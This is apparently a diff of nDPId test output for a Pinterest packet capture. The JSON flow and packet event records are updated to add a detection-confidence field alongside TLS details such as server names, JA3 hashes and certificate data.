+00996{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":151,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+02777{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":154,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605289714142,"flow_last_seen":1605289714230,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":583,"midstream":0,"ts_msec":1605289714230,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s.pinimg.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33156,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714250,"pkt":"qtsDr8lk5EKm5WPyht1gA+BkACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUgYQBu4mXWd7qkQRvgBAJlouHAAABAQgKz6oyaMK4cmQ="}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714250,"flow_last_seen":1605289714250,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1605289714250,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":58726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -67,70 +67,70 @@
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":489,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605289714558,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714558,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACgGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX0AAAAAoAL9IDgIAAACBAWgBAIICpXXZO8AAAAAAQMDBw=="}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714581,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSYAGQEAAHoLAAAAAAAAAAAqAcsBIEmLB5kd7IUo3\/YpAbu3uEYmtpAnJzl+oBJXgPrGAAACBAV4AQMDAwQCCArCuSOMlddk7w=="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714581,"pkt":"qtsDr8lk5EKm5WPyht1gA76\/ACAGQCoBywEgSYsHmR3shSjf9ikmABkBAAB6CwAAAAAAAAAAt7gBuycnOX5GJraRgBAB+37BAAABAQgKlddlBsK5I4w="}
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714558,"flow_last_seen":1605289714581,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714581,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714590,"flow_last_seen":1605289714590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289714590,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605289714590,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714590,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGoAAAAAoAL9IGNfAAACBAWgBAIICskVTwYAAAAAAQMDBw=="}
-00946{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00972{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":505,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714558,"flow_last_seen":1605289714615,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289714615,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sessions.bugsnag.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605289714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714616,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbue9py+eGX+6kRroBJXgA2NAAACBAV4AQMDAwQCCArCuSOwyRVPBg=="}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605289714616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714616,"pkt":"qtsDr8lk5EKm5WPyht1gDTn6ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAEnvYBu\/7qRGucvnhmgBAB+5GEAAABAQgKyRVPIMK5I7A="}
-00919{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714590,"flow_last_seen":1605289714617,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714617,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289714658,"flow_last_seen":1605289714658,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1605289714658,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":525,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605289714658,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714658,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSXwAAAAAoAL9ILsUAAACBAWgBAIICs+qM\/8AAAAAAQMDBw=="}
-00960{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":528,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714590,"flow_last_seen":1605289714660,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"ts_msec":1605289714660,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2004","src_port":40694,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605289714697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1605289714697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleFQqAcsBIEmLB5kd7IUo3\/YpAbuCAAsx4c9qQ0l9oBJXgI0UAAACBAV4AQMDAwQCCArCuSQBz6oz\/w=="}
 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605289714697,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1605289714697,"pkt":"qtsDr8lk5EKm5WPyht1gCBesACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXhUggABu2pDSX0LMeHQgBAB+xD+AAABAQgKz6o0J8K5JAE="}
-00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-00983{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
-02764{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":583,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1605289714658,"flow_last_seen":1605289714740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":411,"midstream":0,"ts_msec":1605289714740,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}}
+00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289714658,"flow_last_seen":1605289714698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"ts_msec":1605289714698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
+01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":575,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289714658,"flow_last_seen":1605289714739,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"ts_msec":1605289714739,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7854","src_port":33280,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"accounts.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
